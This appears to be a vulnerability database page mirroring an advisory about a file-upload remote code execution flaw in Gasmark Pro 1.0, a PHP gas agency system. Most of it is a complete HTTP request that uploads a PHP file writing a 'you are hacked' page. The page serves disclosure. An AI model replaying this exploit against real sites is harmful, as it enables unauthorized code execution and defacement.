Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNu11secur1tyPACKETSTORM:177625
HistoryMar 18, 2024 - 12:00 a.m.

Gasmark Pro 1.0 Shell Upload

2024-03-1800:00:00
nu11secur1ty
packetstormsecurity.com
52
gasmark pro
shell upload
remote code execution
mayurik
file upload
rce
vulnerability
web security
php
application security

7.4 High

AI Score

Confidence

Low

JSON
`## Title: GASMARK PRO-1.0 File Upload RCE  
  
## Author: nu11secur1ty  
## Date: 03/17/2024  
## Vendor: https://www.mayurik.com/  
## Software: https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html  
## Reference: https://portswigger.net/web-security/file-upload  
## Reference: https://www.cloudflare.com/learning/security/what-is-remote-code-execution/  
  
## Description:  
Vulnerable input:  
`<input type="file" class="form-control" id="productImage"  
name="productImage" style="width:auto;">`  
This application suffers from shell upload and remote code execution  
vulnerability, the attacker easily  
can destroy this system, when he has credentials.  
  
STATUS: HIGH- Vulnerability CRITICAL  
  
[+]Exploit:  
```PHP  
POST /gasmark/gasmark/php_action/createclient.php HTTP/1.1  
Host: pwnedhost.com  
Cookie: PHPSESSID=1afinf22p9snl2nai24g29duuc  
Content-Length: 1063  
Cache-Control: max-age=0  
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"  
Sec-Ch-Ua-Mobile: ?0  
Sec-Ch-Ua-Platform: "Windows"  
Upgrade-Insecure-Requests: 1  
Origin: https://pwnedhost.com  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryb4PfTJ8hUNsEjxtB  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112  
Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: https://pwnedhost.com/gasmark/gasmark/add_client.php  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Priority: u=0, i  
Connection: close  
  
------WebKitFormBoundaryb4PfTJ8hUNsEjxtB  
Content-Disposition: form-data; name="currnt_date"  
  
  
------WebKitFormBoundaryb4PfTJ8hUNsEjxtB  
Content-Disposition: form-data; name="name"  
  
pwned  
------WebKitFormBoundaryb4PfTJ8hUNsEjxtB  
Content-Disposition: form-data; name="gender"  
  
Female  
------WebKitFormBoundaryb4PfTJ8hUNsEjxtB  
Content-Disposition: form-data; name="mob_no"  
  
1234  
------WebKitFormBoundaryb4PfTJ8hUNsEjxtB  
Content-Disposition: form-data; name="reffering"  
  
1234  
------WebKitFormBoundaryb4PfTJ8hUNsEjxtB  
Content-Disposition: form-data; name="address"  
  
1234  
------WebKitFormBoundaryb4PfTJ8hUNsEjxtB  
Content-Disposition: form-data; name="productImage"; filename="1nsi1deyou.php"  
Content-Type: application/octet-stream  
  
<?php  
// by nu11secur1ty - 2023  
$fh = fopen('test.html', 'a');  
fwrite($fh, '<h1>Hello, you are hacked by Fileupload and RCE!</h1>');  
fclose($fh);  
  
//nlink('test.html');  
?>  
  
------WebKitFormBoundaryb4PfTJ8hUNsEjxtB  
Content-Disposition: form-data; name="create"  
  
  
------WebKitFormBoundaryb4PfTJ8hUNsEjxtB--  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/03/gasmark-pro-10-file-upload-rce.html)  
  
## Time spent:  
00:25:00  
  
`

7.4 High

AI Score

Confidence

Low

JSON